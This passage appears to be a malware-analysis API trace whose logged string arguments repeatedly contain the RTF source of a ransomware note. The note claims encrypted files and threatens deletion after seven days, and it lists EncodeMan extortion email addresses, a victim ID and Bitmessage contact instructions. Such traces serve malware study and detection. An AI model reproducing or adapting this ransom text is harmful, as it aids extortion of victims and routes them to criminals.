bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.265] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.265] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2358878, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 